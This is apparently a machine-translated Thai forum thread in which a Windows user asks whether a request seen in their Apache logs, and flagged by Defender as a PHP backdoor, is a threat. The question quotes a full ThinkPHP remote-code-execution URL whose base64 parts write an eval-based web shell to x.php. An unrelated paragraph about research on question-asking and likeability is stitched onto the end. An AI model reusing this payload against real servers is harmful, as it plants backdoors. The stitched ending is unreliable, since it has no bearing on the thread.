Score:0

Apache 2.4.51 การป้องกัน URL

ธง id

ฉันใช้ Apache 2.4.51 กับ PHP 8.1.0 บนพีซีที่ใช้ Windows 10 เมื่อเร็ว ๆ นี้ ฉันสังเกตเห็นบางรายการในบันทึกของฉันและการแจ้งเตือนที่เกี่ยวข้องจาก Windows Defender ตัวอย่างตัวการที่ทำให้เกิดการแจ้งเตือน AV คือ https://jacobsm.com/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen (base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs)); ซึ่งให้รหัสตอบกลับ 200 รหัส และการแจ้งเตือนจาก Windows Defender ของ ประตูหลัง: PHP/Remoteshell.B. Defender ยังระบุว่าสถานะล้มเหลวและอาจไม่ได้รับการแก้ไขอย่างสมบูรณ์ ไฟล์ที่ได้รับผลกระทบคือไฟล์บันทึกของ Apache ดังนั้นจึงไม่สามารถกักกันได้เนื่องจาก Apache ใช้งานอยู่ ฉันสงสัยว่าเป็นกังวลว่าไฟล์อาจถูกตีความโดยตัวประมวลผล PHP (แม้ว่าจะไม่เป็นเช่นนั้นก็ตาม) ฉันควรกังวลหรือไม่?

in flag
ใช่คุณควรจะ. พีซีที่ใช้ Windows ของคุณอาจถูกเปิดเผยต่ออินเทอร์เน็ตโดยตรง หรือคุณมีมัลแวร์ที่โรมมิ่งอยู่ใน LAN ของคุณ ทั้งคู่เป็นปัญหาที่ควรได้รับการแก้ไข
id flag
โอเค ฉันลบ PHP ออกจากสแต็กแล้ว และใช้เทคนิคทางเลือกเพื่อให้ได้สิ่งที่ได้รับจาก PHP ตอนนี้ฉันควรจะปลอดภัยด้วย Apache 2.4.51 ที่รันอยู่ใช่ไหม!?

โพสต์คำตอบ

คนส่วนใหญ่ไม่เข้าใจว่าการถามคำถามมากมายจะปลดล็อกการเรียนรู้และปรับปรุงความสัมพันธ์ระหว่างบุคคล ตัวอย่างเช่น ในการศึกษาของ Alison แม้ว่าผู้คนจะจำได้อย่างแม่นยำว่ามีคำถามกี่ข้อที่ถูกถามในการสนทนา แต่พวกเขาไม่เข้าใจความเชื่อมโยงระหว่างคำถามและความชอบ จากการศึกษาทั้ง 4 เรื่องที่ผู้เข้าร่วมมีส่วนร่วมในการสนทนาด้วยตนเองหรืออ่านบันทึกการสนทนาของผู้อื่น ผู้คนมักไม่ตระหนักว่าการถามคำถามจะมีอิทธิพลหรือมีอิทธิพลต่อระดับมิตรภาพระหว่างผู้สนทนา